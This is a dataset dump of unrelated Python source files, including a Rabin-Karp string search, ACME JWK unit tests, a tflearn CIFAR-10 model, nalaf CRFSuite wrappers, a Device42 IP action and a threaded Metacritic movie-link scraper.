BackgroundNoHtml='string',\n )\n\n #alldefs[\"vw_displayableMembers\"] = dict(\n #IIDD='string',\n #Name='string',\n #)\n\n #alldefs[\"vw_displayablePhotoIDs\"] = dict(\n #PhotoID='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosGroupedAndOrd\"] = dict(\n #EventID='string',\n #FixedRandomValue='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosHighestRanke1\"] = dict(\n #EventID='string',\n #PhotoPath='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosHighestRanked\"] = dict(\n #EventID='string',\n #PhotoID='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosOrderedByRan1\"] = dict(\n #EventID='string',\n #FixedRandomValue='string',\n #EventPhotoRank='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosOrderedByRank\"] = dict(\n #EventID='string',\n #PhotoID='string',\n #EventPhotoRank='string',\n #RandomValue='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosGroupedAndOr\"] = dict(\n #MemberID='string',\n #FixedRandomValue='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosHighestRank1\"] = dict(\n #MemberID='string',\n #PhotoPath='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosHighestRanke\"] = dict(\n 
#MemberID='string',\n #PhotoID='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosOrderedByRa1\"] = dict(\n #MemberID='string',\n #FixedRandomValue='string',\n #MemberPhotoRank='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosOrderedByRan\"] = dict(\n #MemberID='string',\n #PhotoID='string',\n #MemberPhotoRank='string',\n #RandomValue='string',\n #)\n\n return alldefs\n\ndef create_db_defs():\n out_name = '/home/haim/fossil_projects/gbs/private/db_defs.py'\n alldefs = fields_template()\n with open(out_name, 'w') as out:\n for tbl in sorted(alldefs):\n out.write(\"db.define_table('{}',\\n\".format(tbl))\n fields = alldefs[tbl]\n for field in sorted(fields):\n out.write(\" Field('{}', type='{}'),\\n\".format(field, fields[field]))\n out.write(')\\n\\n')\n \nif __name__ == '__main__':\n create_db_defs() \n","sub_path":"modules/porting/old_db_mappings.py","file_name":"old_db_mappings.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"417708666","text":"def Rabin_Karp(p,c):\n\t'''\n\tRabin-Karp algorithm -- rolling hash:\n\tpick two suitable coprime constants b and h (1 < b < h), treat each\n\tlength-clen window of the text as a number in base b, and slide the\n\twindow while updating its hash in O(1) per step.\n\t'''\n\tclen = len(c)\n\tplen = len(p)\n\tif clen > plen:\n\t\treturn False\n\tres = []\n\t# hash radix\n\tb = 2 # 100000000007\n\tt = b**clen\n\n\t# hashes of the length-clen prefix of p and of the whole pattern c\n\tphash=0\n\tchash=0\n\tfor i in range(clen):\n\t\tphash = phash * b + ord(p[i])\n\t\tchash = chash * b + ord(c[i])\n\n\t# slide the window over p one character at a time, updating the hash and comparing\n\tfor x in range(0, plen-clen+1):\n\t\tif phash == chash:\n\t\t\tres.append(x)\n\t\tif x + clen < plen:\n\t\t\tphash = phash*b - ord(p[x])*t + ord(p[x+clen])\n\n\tif res:\n\t\treturn res\n\telse:\n\t\treturn False\n\n\nprint(Rabin_Karp('abcbc','ebc')) ","sub_path":"String Problem/Rabin_Karp.py","file_name":"Rabin_Karp.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"230549123","text":"import os\nimport abacusSoftware.constants as constants\nimport pyAbacus as abacus\nfrom PyQt5 import QtGui\n\ndef timeInUnitsToMs(time):\n value = 0\n if 'ms' in time:\n value = int(time.replace(' ms', ''))\n elif 's' in time:\n value = float(time.replace(' s', ''))\n value = int(1000 * value)\n return value\n\ndef setSamplingComboBox(comboBox, values = abacus.constants.SAMPLING_VALUES, default_value = abacus.constants.SAMPLING_DEFAULT_VALUE):\n comboBox.clear()\n\n model = comboBox.model()\n for row in values:\n if row < 1000:\n item = QtGui.QStandardItem(\"%d ms\" % row)\n elif row < 10000:\n item = QtGui.QStandardItem(\"%.1f s\" % (row / 1000))\n else:\n item = QtGui.QStandardItem(\"%d s\" % (row / 1000))\n # if row < abacus.SAMP_CUTOFF:\n # item.setBackground(QtGui.QColor('red'))\n # item.setForeground(QtGui.QColor('white'))\n model.appendRow(item)\n if default_value < 1000: unit = \"ms\"; value = default_value\n else: unit = \"s\"; value = default_value // 1000\n comboBox.setCurrentIndex(comboBox.findText(\"%d %s\"%(value, unit)))\n\ndef setCoincidenceSpinBox(spinBox, value = abacus.constants.COINCIDENCE_WINDOW_DEFAULT_VALUE):\n spinBox.setMinimum(abacus.constants.COINCIDENCE_WINDOW_MINIMUM_VALUE)\n spinBox.setMaximum(abacus.constants.COINCIDENCE_WINDOW_MAXIMUM_VALUE)\n spinBox.setSingleStep(abacus.constants.COINCIDENCE_WINDOW_STEP_VALUE)\n spinBox.setValue(value)\n \ndef setDelaySpinBox(spinBox, value = abacus.constants.DELAY_DEFAULT_VALUE):\n spinBox.setMinimum(abacus.constants.DELAY_MINIMUM_VALUE)\n spinBox.setMaximum(abacus.constants.DELAY_MAXIMUM_VALUE)\n spinBox.setSingleStep(abacus.constants.DELAY_STEP_VALUE)\n spinBox.setValue(value) \n\ndef 
setSleepSpinBox(spinBox, value = abacus.constants.SLEEP_DEFAULT_VALUE):\n spinBox.setMinimum(abacus.constants.SLEEP_MINIMUM_VALUE)\n spinBox.setMaximum(abacus.constants.SLEEP_MAXIMUM_VALUE)\n spinBox.setSingleStep(abacus.constants.SLEEP_STEP_VALUE)\n spinBox.setValue(value)\n\ndef findWidgets(class_, widget):\n return [att for att in dir(class_) if widget in att]\n\ndef unicodePath(path):\n return path.replace(\"\\\\\", \"/\")\n\ndef readConstantsFile():\n if os.path.exists(constants.SETTINGS_PATH):\n with open(constants.SETTINGS_PATH) as file:\n for line in file:\n try:\n exec(\"constants.%s\" % line)\n except SyntaxError as e:\n pass\n constants.SETTING_FILE_EXISTS = True\n else:\n print(\"Settings file not found at: %s\"%constants.SETTINGS_PATH)\n\ndef updateConstants(class_):\n for (name, action) in zip(constants.WIDGETS_NAMES, constants.WIDGETS_SET_ACTIONS):\n attributes = findWidgets(class_, name)\n for att in attributes:\n if att in dir(constants):\n val = eval(\"constants.%s\"%att)\n if name != \"comboBox\":\n try: #if the element does not exist, skip. Example: sleep_C in a 2ch device\n exec(action%(att, val)) \n except:\n pass\n \n else:\n try: #if the element does not exist, skip. Example: sleep_C in a 2ch device\n exec(action%(att, att, val))\n except:\n pass\n\ndef findDocuments():\n if constants.CURRENT_OS == \"win32\":\n import ctypes.wintypes\n buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)\n ctypes.windll.shell32.SHGetFolderPathW(None, 5, None, 0, buf)\n buf = buf.value\n else:\n buf = os.path.expanduser(\"~\")\n return buf\n","sub_path":"AbacusSoftware/abacusSoftware/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163734257","text":"\"\"\"Tests for acme.jose.jwk.\"\"\"\nimport os\nimport pkg_resources\nimport unittest\n\nfrom Crypto.PublicKey import RSA\n\nfrom acme.jose import errors\nfrom acme.jose import util\n\n\nRSA256_KEY = util.HashableRSAKey(RSA.importKey(pkg_resources.resource_string(\n __name__, os.path.join('testdata', 'rsa256_key.pem'))))\nRSA512_KEY = util.HashableRSAKey(RSA.importKey(pkg_resources.resource_string(\n __name__, os.path.join('testdata', 'rsa512_key.pem'))))\n\n\nclass JWKOctTest(unittest.TestCase):\n \"\"\"Tests for acme.jose.jwk.JWKOct.\"\"\"\n\n def setUp(self):\n from acme.jose.jwk import JWKOct\n self.jwk = JWKOct(key='foo')\n self.jobj = {'kty': 'oct', 'k': 'foo'}\n\n def test_to_partial_json(self):\n self.assertEqual(self.jwk.to_partial_json(), self.jobj)\n\n def test_from_json(self):\n from acme.jose.jwk import JWKOct\n self.assertEqual(self.jwk, JWKOct.from_json(self.jobj))\n\n def test_from_json_hashable(self):\n from acme.jose.jwk import JWKOct\n hash(JWKOct.from_json(self.jobj))\n\n def test_load(self):\n from acme.jose.jwk import JWKOct\n self.assertEqual(self.jwk, JWKOct.load('foo'))\n\n def test_public(self):\n self.assertTrue(self.jwk.public() is self.jwk)\n\n\nclass JWKRSATest(unittest.TestCase):\n \"\"\"Tests for acme.jose.jwk.JWKRSA.\"\"\"\n\n def setUp(self):\n from acme.jose.jwk import JWKRSA\n self.jwk256 = JWKRSA(key=RSA256_KEY.publickey())\n self.jwk256_private = JWKRSA(key=RSA256_KEY)\n self.jwk256json = {\n 'kty': 'RSA',\n 'e': 'AQAB',\n 'n': 'm2Fylv-Uz7trgTW8EBHP3FQSMeZs2GNQ6VRo1sIVJEk',\n }\n self.jwk512 = JWKRSA(key=RSA512_KEY.publickey())\n self.jwk512json = {\n 'kty': 'RSA',\n 'e': 'AQAB',\n 'n': 'rHVztFHtH92ucFJD_N_HW9AsdRsUuHUBBBDlHwNlRd3fp5'\n 
'80rv2-6QWE30cWgdmJS86ObRz6lUTor4R0T-3C5Q',\n }\n\n def test_equals(self):\n self.assertEqual(self.jwk256, self.jwk256)\n self.assertEqual(self.jwk512, self.jwk512)\n\n def test_not_equals(self):\n self.assertNotEqual(self.jwk256, self.jwk512)\n self.assertNotEqual(self.jwk512, self.jwk256)\n\n def test_load(self):\n from acme.jose.jwk import JWKRSA\n self.assertEqual(\n JWKRSA(key=util.HashableRSAKey(RSA256_KEY)), JWKRSA.load(\n pkg_resources.resource_string(\n __name__, os.path.join('testdata', 'rsa256_key.pem'))))\n\n def test_public(self):\n self.assertEqual(self.jwk256, self.jwk256_private.public())\n\n def test_to_partial_json(self):\n self.assertEqual(self.jwk256.to_partial_json(), self.jwk256json)\n self.assertEqual(self.jwk512.to_partial_json(), self.jwk512json)\n\n def test_from_json(self):\n from acme.jose.jwk import JWK\n self.assertEqual(self.jwk256, JWK.from_json(self.jwk256json))\n # TODO: fix schemata to allow RSA512\n #self.assertEqual(self.jwk512, JWK.from_json(self.jwk512json))\n\n def test_from_json_hashable(self):\n from acme.jose.jwk import JWK\n hash(JWK.from_json(self.jwk256json))\n\n def test_from_json_non_schema_errors(self):\n # valid against schema, but still failing\n from acme.jose.jwk import JWK\n self.assertRaises(errors.DeserializationError, JWK.from_json,\n {'kty': 'RSA', 'e': 'AQAB', 'n': ''})\n self.assertRaises(errors.DeserializationError, JWK.from_json,\n {'kty': 'RSA', 'e': 'AQAB', 'n': '1'})\n\n\nif __name__ == '__main__':\n unittest.main() # pragma: no cover\n","sub_path":"acme/jose/jwk_test.py","file_name":"jwk_test.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"55490487","text":"'''\r\nCreated on 2018/09/19\r\n\r\n@author: Taichi\r\n'''\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import ListedColormap\r\n\r\ndef plot_decision_regions(x,y,classifier,test_idx=None,resolution=0.02):\r\n markers=('s','x','o','^','v')\r\n colors=('red','blue','lightgreen','gray','cyan')\r\n cmap=ListedColormap(colors[:len(np.unique(y))])\r\n\r\n x1_min,x1_max=x[:,0].min()-1,x[:,0].max()+1\r\n x2_min,x2_max=x[:,1].min()-1,x[:,1].max()+1\r\n\r\n xx1,xx2=np.meshgrid(np.arange(x1_min,x1_max,resolution),\r\n np.arange(x2_min,x2_max,resolution))\r\n Z=classifier.predict(np.array([xx1.ravel(),xx2.ravel()]).T)\r\n Z=Z.reshape(xx1.shape)\r\n plt.contourf(xx1,xx2,Z,alpha=0.4,cmap=cmap)\r\n plt.xlim(xx1.min(),xx1.max())\r\n plt.ylim(xx2.min(),xx2.max())\r\n\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=x[y==cl,0],y=x[y==cl,1],\r\n alpha=0.8,c=cmap(idx),\r\n marker=markers[idx],label=cl)\r\n if test_idx:\r\n x_test,y_test=x[test_idx,:],y[test_idx]\r\n plt.scatter(x_test[:,0],x_test[:,1],c='',alpha=1.0,linewidth=1,marker='o',s=55,label='test_set')\r\n\r\nlink=''\r\nlink2=''\r\ndf=pd.read_csv(link,encoding='cp932')\r\ndf=pd.read_table(link,encoding='cp932')\r\ndf=pd.read_excel(link,sheetname='',encoding='cp932')\r\ndf2=pd.read_csv(link2,encoding='cp932')\r\ndf2=pd.read_table(link2,encoding='cp932')\r\ndf2=pd.read_excel(link2,sheetname='',encoding='cp932')\r\n\r\n#The data is split into two separate files here, but a k-fold split or similar would work as well\r\nx_train=df[''].values\r\ny_train=df[''].values\r\nx_test=df2[''].values\r\ny_test=df2[''].values\r\nx_combined=np.vstack([x_train,x_test])\r\ny_combined=np.hstack([y_train,y_test])\r\n\r\nfrom sklearn.ensemble import 
RandomForestClassifier\r\n#create a random forest instance that uses entropy as its split criterion\r\nforest=RandomForestClassifier(criterion='entropy',n_estimators=10,random_state=1,n_jobs=2)\r\n#fit the random forest model to the training data\r\nforest.fit(x_train,y_train)\r\nplot_decision_regions(x_combined,y_combined,classifier=forest,test_idx=range(105,150))\r\nplt.xlabel('')\r\nplt.ylabel('')\r\nplt.legend(loc='upper left')\r\nplt.show()","sub_path":"RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"66516401","text":"from __future__ import division, print_function, absolute_import\n\nimport tflearn\nfrom tflearn.data_utils import shuffle, to_categorical\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.normalization import local_response_normalization\nfrom tflearn.data_preprocessing import ImagePreprocessing\nfrom tflearn.layers.estimator import regression\n\n\ndef get_data():\n # Data loading and preprocessing\n from tflearn.datasets import cifar10\n (X, Y), (X_test, Y_test) = cifar10.load_data()\n X, Y = shuffle(X, Y)\n Y = to_categorical(Y, 10)\n Y_test = to_categorical(Y_test, 10)\n return (X, Y), (X_test, Y_test)\n\n\ndef get_network():\n # Building convolutional network\n network = input_data(shape=[None, 32, 32, 3], name='input')\n network = conv_2d(network, 32, 3, activation='relu', regularizer=\"L2\")\n network = max_pool_2d(network, 2)\n network = conv_2d(network, 64, 3, activation='relu', regularizer=\"L2\")\n network = max_pool_2d(network, 2)\n\n network = conv_2d(network, 128, 3, activation='relu', regularizer=\"L2\")\n network = max_pool_2d(network, 2)\n\n network = fully_connected(network, 256, activation='relu')\n network = dropout(network, 0.8)\n network = fully_connected(network, 10, activation='softmax')\n network = regression(network, optimizer='adam', learning_rate=0.01,\n loss='categorical_crossentropy', name='target')\n return network\n\n\ndef main():\n name = 'model6'\n (X, Y), (X_test, Y_test) = get_data()\n network = get_network()\n\n # Training\n model = tflearn.DNN(network, tensorboard_verbose=0, checkpoint_path='checkpoints/' + name + '.tfl.ckpt')\n\n model.load('checkpoints/' + name + '.tfl')\n model.fit({'input': X}, {'target': Y}, n_epoch=12,\n validation_set=({'input': X_test}, {'target': Y_test}),\n snapshot_step=100, show_metric=True, batch_size=96, run_id='cifar10_cnn6')\n\n # Manually save model\n model.save('checkpoints/' + name + '.tfl')\n\n\nmain()\n","sub_path":"tensor6.py","file_name":"tensor6.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"459062061","text":"import os\nimport sys\nimport warnings\n\nimport pycrfsuite\n\nfrom nalaf.structures.data import Label\nfrom nalaf.learning.taggers import Tagger\n\n\nclass PyCRFSuite:\n\n def __init__(self, model_file=None):\n self.model_file = model_file\n\n if self.model_file is None:\n self.tagger = None\n else:\n self.tagger = pycrfsuite.Tagger()\n self.tagger.open(self.model_file)\n\n\n def annotate(self, corpus, class_id):\n \"\"\"\n :type corpus: nalaf.structures.data.Dataset\n :type class_id: str ~ to annotate with\n \"\"\"\n\n for sentence in corpus.sentences():\n labels = self.tagger.tag(pycrfsuite.ItemSequence(token.features for token in sentence))\n\n for token_index in range(len(sentence)):\n label = 
labels[token_index]\n sentence[token_index].predicted_labels = [Label(label, self.tagger.marginal(label, token_index))]\n\n corpus.form_predicted_annotations(class_id)\n\n\n @staticmethod\n def train(data, model_file, params=None):\n \"\"\"\n :type data: nalaf.structures.data.Dataset\n :type model_file: str ~ filename (from local file system) to save trained model to. If None, no model is saved.\n \"\"\"\n\n trainer = pycrfsuite.Trainer()\n if params is not None:\n trainer.set_params(params)\n\n for sentence in data.sentences():\n trainer.append(pycrfsuite.ItemSequence([token.features for token in sentence]),\n [token.original_labels[0].value for token in sentence])\n\n # The CRFSuite library handles the \"pickling\" of the file; saves the model here\n trainer.train(model_file)\n\n\n @staticmethod\n def tag(data, model_file, class_id):\n warnings.warn('Use non-static `annotate` instead', DeprecationWarning)\n\n \"\"\"\n :type data: nalaf.structures.data.Dataset\n :type model_file: str\n \"\"\"\n\n tagger = pycrfsuite.Tagger()\n tagger.open(model_file)\n\n for sentence in data.sentences():\n labels = tagger.tag(pycrfsuite.ItemSequence(token.features for token in sentence))\n\n for token_index in range(len(sentence)):\n label = labels[token_index]\n sentence[token_index].predicted_labels = [Label(label, tagger.marginal(label, token_index))]\n\n data.form_predicted_annotations(class_id)\n\n\nclass CRFSuite:\n \"\"\"\n Basic class for interaction with CRFSuite\n \"\"\"\n\n def __init__(self, directory, minify=False):\n warnings.warn('Deprecated. Please use PyCRFSuite instead', DeprecationWarning)\n\n self.directory = os.path.abspath(directory)\n \"\"\"the directory where the CRFSuite executable is located\"\"\"\n self.model_filename = 'example_entity_model'\n \"\"\"name to be used for saving the model\"\"\"\n if sys.platform.startswith('linux'):\n self.crf_suite_call = './crfsuite'\n else:\n self.crf_suite_call = 'crfsuite'\n self.minify = minify\n \"\"\"controls whether to replace feature names with an index in order to minimize input file length\"\"\"\n\n\n def create_input_file(self, dataset, mode):\n \"\"\"\n Creates the input files for training, testing or prediction in the appropriate format required by CRFSuite.\n Saves the files in the same directory where the executable is located.\n\n :type dataset: nalaf.structures.data.Dataset\n :param mode: one of the following 'train' or 'test' or 'predict'\n :type mode: str\n \"\"\"\n if self.minify:\n key_map = {key: index for index, key in\n enumerate(set(key for token in dataset.tokens() for key in token.features.keys()))}\n key_string = lambda key: key_map[key]\n else:\n key_string = lambda key: key\n\n with open(os.path.join(self.directory, mode), 'w', encoding='utf-8') as file:\n for sentence in dataset.sentences():\n for token in sentence:\n features = '\\t'.join(['{}:{}'.format(key_string(key), value)\n if type(value) is float\n else '{}={}'.format(key_string(key), str(value).replace(':', '_COLON_'))\n for key, value in token.features.items()])\n\n if mode in ('train', 'test'):\n label = token.original_labels[0].value\n else:\n label = '?'\n file.write('{}\\t{}\\n'.format(label, features))\n file.write('\\n')\n\n\n def learn(self, options=''):\n \"\"\"\n Train and save a CRF model with the latest train file.\n \"\"\"\n os.chdir(self.directory)\n if options:\n os.system('{} learn {}'.format(self.crf_suite_call, options))\n else:\n os.system('{} learn -m {} train'.format(self.crf_suite_call, self.model_filename))\n\n\n def tag(self, 
options=''):\n \"\"\"\n Test a CRF model with the latest model and test file.\n \"\"\"\n os.chdir(self.directory)\n if options:\n os.system('{} tag {}'.format(self.crf_suite_call, options))\n else:\n os.system('{} tag -qt -m {} test'.format(self.crf_suite_call, self.model_filename))\n\n\n def read_predictions(self, dataset, class_id, prediction_file='output.txt'):\n \"\"\"\n :type dataset: nalaf.structures.data.Dataset\n\n Reads in the predictions made by our model for each token and stores them into token.predicted_label[]\n\n Requires a dataset object and the output prediction file.\n\n The default output prediction file is 'output.txt'. The format is:\n * [predicted label]:[marginal probability]\n * in new line for each token\n * followed by a blank line for the end of the sentence\n\n IMPORTANT NOTE:\n Assumes a call to the test() function was made previously with the 'i' option included.\n Furthermore, it assumes we are calling it with the same dataset object used to create the test file.\n\n For example first we would call:\n * crf.create_input_file(dataset=test, mode='test')\n * crf.test(options='-m example_entity_model -i test > output.txt')\n Then we would call:\n * crf.read_predictions(dataset=test)\n \"\"\"\n\n os.chdir(self.directory)\n with open(prediction_file) as file:\n for sentence in dataset.sentences():\n for token in sentence:\n label, probability = file.readline().split(':')\n token.predicted_labels = [Label(label, float(probability))]\n\n file.readline() # skip the empty line signifying new sentence\n\n # call form_predicted_annotations() to populate the mention level predictions\n dataset.form_predicted_annotations(class_id)\n\n\nclass CRFSuiteTagger(Tagger):\n \"\"\"\n Performs tagging with a binary model using CRFSuite\n\n :type crf_suite: nalaf.learning.crfsuite.CRFSuite\n \"\"\"\n\n def __init__(self, predicts_classes, crf_suite, model_file='example_entity_model'):\n warnings.warn('Use PyCRFSuite', DeprecationWarning)\n\n super().__init__(predicts_classes)\n self.crf_suite = crf_suite\n \"\"\"an instance of CRFSuite used to actually generate predictions\"\"\"\n self.model_file = model_file\n \"\"\"path to the binary model used for generating predictions\"\"\"\n\n def tag(self, dataset):\n \"\"\"\n :type dataset: nalaf.structures.data.Dataset\n \"\"\"\n self.crf_suite.create_input_file(dataset, 'predict')\n self.crf_suite.tag('-m {} -i predict > output.txt'.format(self.model_file))\n # read_predictions() needs the class id in order to form the mention-level annotations\n self.crf_suite.read_predictions(dataset, self.predicts_classes)\n","sub_path":"nalaf/learning/crfsuite.py","file_name":"crfsuite.py","file_ext":"py","file_size_in_byte":7835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"87071015","text":"from lib.base_action import BaseAction\n\n\nclass CreateIP(BaseAction):\n def run(self, subnet_network_mask=None, subnet_name=None,\n vrf_group_id=None, vrf_group=None,\n ipaddress=None, macaddress=None, ip_type=None, tags=None,\n device_name=None, available=None, clear_all=None,\n debug=False):\n\n payload = {\n \"ipaddress\": ipaddress, \"subnet\": subnet_name,\n \"macaddress\": macaddress, \"ip_type\": ip_type,\n \"tags\": tags, \"device\": device_name\n }\n\n print(\"payload: %s\" % payload)\n d42_headers = {'Accept': 'application/json'}\n response = self.post(\n endpoint=\"ips/\",\n payload=payload,\n headers=d42_headers\n )\n # d42 api agent returns response.json(0) if response.ok...:\n if type(response) is dict:\n return response\n else:\n return 
response.text\n","sub_path":"actions/create_or_edit_ip.py","file_name":"create_or_edit_ip.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485970988","text":"import os\nimport threading\nfrom queue import Queue\nimport logging\nimport requests\nfrom requests.exceptions import ConnectionError\nfrom bs4 import BeautifulSoup\nfrom page_urls import get_page_links,get_number_of_pages\nfrom constants import all_movies_by_year,header\nimport re\nimport json\nparams = {'year_selected':2018, 'sort':'desc'}\nimport time\nimport random\nfrom threading import Lock,Thread\n\nlogging.basicConfig(format='%(asctime)s -%(funcName)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.INFO, filename=\"log_file.log\")\n\nextract_year_from_url = re.compile('year_selected=(\\d{4})')\n\ndef get_year(url):\n return extract_year_from_url.findall(url)[0]\n\ndef get_links_for_all_movies_by_year(year):\n '''gets the links to all movies in a given year'''\n\n params = {'year_selected':year, 'sort':'desc'}\n\n num_pages = get_number_of_pages(f'{all_movies_by_year}/filtered?year_selected={year}')\n\n if num_pages == '0':\n return [f'{all_movies_by_year}/filtered?year_selected={year}&sort=desc&page={0}']\n else:\n links = [f'{all_movies_by_year}/filtered?year_selected={year}&sort=desc&page={i}' for i in range(0,int(num_pages))]\n\n return links\n\ndef get_links_to_all_movies_on_page(page_url):\n '''takes the url of a to a page with movies as input, returns a list of with urls to all the movies that appear in the page'''\n try:\n page = requests.get(page_url,headers=header)\n except ConnectionError:\n print('Connection error, trying again in 10')\n time.sleep(10)\n return get_links_to_all_movies_on_page(page_url)\n\n except Exception as e:\n logging.error(e)\n\n\n soup = BeautifulSoup(page.content,features=\"html.parser\")\n\n movie_tags = soup.select('span.title.numbered + a.title')\n movie_links = [link.attrs['href'] for link in movie_tags]\n movie_links = [f'https://www.metacritic.com/movie{link}' for link in movie_links]\n\n return movie_links\n\n\n\ndef get_link_for_all_movies_in_single_year(task_queue, write_queue):\n '''takes a list of urls as input, find all the movies in those urls and puts that result (a dict) on queue'''\n tmp_dict = {}\n\n while not task_queue.empty():\n url = task_queue.get()\n year = get_year(url[0])\n\n for link in url:\n\n\n print(f' ({year}) Getting url {link}')\n time.sleep(random.uniform(0.5,1))\n\n completed = False\n\n while not completed:\n try:\n page = requests.get(link,headers=header)\n soup = BeautifulSoup(page.content, features=\"html.parser\")\n movie_titles = [title.text for title in soup.select('span.title.numbered + a h3')]\n movie_tags = soup.select('span.title.numbered + a.title')\n movie_links = [link.attrs['href'] for link in movie_tags]\n movie_name_and_link = {name: f'https://www.metacritic.com{link}' for name, link in\n zip(movie_titles, movie_links)}\n tmp_dict.update({year:movie_name_and_link})\n time.sleep(random.uniform(1, 2))\n completed = True\n\n except ConnectionError:\n print('Connection error, retrying in 10 seconds')\n time.sleep(10)\n\n except Exception as e:\n logging.error(f'Was unable to download {link}, ({e})')\n break\n task_queue.task_done()\n\n write_queue.put(tmp_dict)\n tmp_dict = {}\n\n print(f'{threading.currentThread().name}: Stopping due to empty queue')\n\ndef make_dict_of_links_to_all_movies_by_year(num_workers):\n 
'''Use workers to get all the movies and save it to a dict that links the movie name to the url to that movie'''\n task_queue = Queue()\n write_queue = Queue()\n write_queue.downloads_complete = False\n\n # get all the links to all the movies\n with open('links_for_all_movies_by_year.txt', 'r') as file:\n content = file.read()\n content = content.split('\n')\n\n # put urls for all the different pages in all years into the task queue\n unique_years = list(set([get_year(link) for link in content]))\n for year in unique_years:\n task_queue.put([item for item in content if get_year(item) == year])\n\n\n # make a writer queue thread\n writer_thread = Thread(target=write_dict_of_links_to_file,args=[write_queue])\n writer_thread.start()\n # start a single pool of workers and wait for them to drain the task queue\n workers = [threading.Thread(name=str(i),target=get_link_for_all_movies_in_single_year,args=[task_queue,write_queue]) for i in range(num_workers)]\n for w in workers:\n w.start()\n for w in workers:\n w.join()\n\n write_queue.downloads_complete = True\n\ndef write_dict_of_links_to_file(queue):\n '''Takes a queue as input and continuously updates the .json files'''\n FILENAME = 'all_movies_with_titles_and_links_by_year.json'\n\n\n if not os.path.isfile(FILENAME):\n with open(FILENAME,'w+') as file:\n pass\n\n while not queue.downloads_complete:\n if queue.empty():\n time.sleep(0.5)\n else:\n output = queue.get()\n with open(FILENAME, 'r+') as file:\n content = file.read()\n if content == '':\n json_dict = output\n file.write(json.dumps(json_dict))\n else:\n try:\n json_dict = json.loads(content)\n json_dict.update(output)\n with open(FILENAME, 'w+') as file2:\n print(f'Updated dict with {output}')\n file2.write(json.dumps(json_dict))\n\n except json.JSONDecodeError as e:\n print(e)\n\n print('Stopping writer queue thread')\n\n\n\n\ndef get_link_of_failed_download(task_queue,write_queue):\n\n while not task_queue.empty():\n time.sleep(random.uniform(0.5,1))\n failed_url = task_queue.get()\n print(f'Trying to fix {failed_url}')\n try:\n page = requests.get(failed_url, headers=header, allow_redirects=True)\n print(f'{failed_url} :: {page.status_code}')\n\n # check if the page was moved\n if 301 in [item.status_code for item in page.history]:\n print(f'{failed_url} has moved')\n real_url = page.url.split('movie_title=')[-1]\n real_url = f'https://www.metacritic.com/movie/{real_url}'\n time.sleep(random.uniform(0.5, 1))\n real_page = requests.get(real_url, headers=header, allow_redirects=True)\n if real_page.status_code == 200:\n soup = BeautifulSoup(real_page.content, features=\"html.parser\")\n product_title = soup.select('.product_page_title h1')[0].text.strip()\n year = soup.select('h1 + .release_year')[0].text.strip()\n\n # send the answer to the write queue\n write_queue.put( (year,product_title,real_page.url) )\n print(f'Fix {product_title}s url to {real_page.url}')\n\n else:\n print(f'Failed to get {real_url} ({real_page.status_code})')\n\n else:\n print(f'{failed_url} has not moved {page.status_code}')\n\n\n except Exception as e:\n print(f'Could not access {failed_url}: {e}')\n\n print('Stopping due to empty task queue')\n\ndef write_fixed_links(task_queue,write_queue):\n\n\n while task_queue.done is False:\n\n while not write_queue.empty():\n year,product_title,fixed_link = write_queue.get()\n\n # open up the json links file and read into memory\n with open('all_movies_with_titles_and_links_by_year.json', 'r') as jsonfile:\n all_movies_dict = json.loads(jsonfile.read())\n 
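# point the stale entry for this title at the resolved redirect URL\n 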
all_movies_dict[year][product_title] = fixed_link\n\n # overwrite the file\n with open('all_movies_with_titles_and_links_by_year.json', 'w') as jsonfile:\n jsonfile.write(json.dumps(all_movies_dict))\n\n print('No fixed urls to write, sleeping for 5 secs')\n time.sleep(5)\n\n print('All tasks done, shutting down write queue')\n\n\ndef get_real_links_of_failed_downloads(num_workers):\n\n write_queue = Queue()\n task_queue = Queue()\n task_queue.done = False\n\n # all the tasks to the task queue\n with open('failed_raw_downloads.txt','r') as file:\n for line in file:\n link,error = line.split(',')\n task_queue.put(link)\n\n # start the workers\n workers = []\n for i in range(num_workers):\n workers.append(threading.Thread(target=get_link_of_failed_download,args=[task_queue,write_queue]))\n\n for w in workers:\n w.start()\n for w in workers:\n w.join()\n\n\n print('All workers finished their jobs')\n task_queue.done = True\n\n\nif __name__ == '__main__':\n\n get_real_links_of_failed_downloads(5)\n\n #make_dict_of_links_to_all_movies_by_year(num_workers=20)\n","sub_path":"get_links_for_all_movies.py","file_name":"get_links_for_all_movies.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 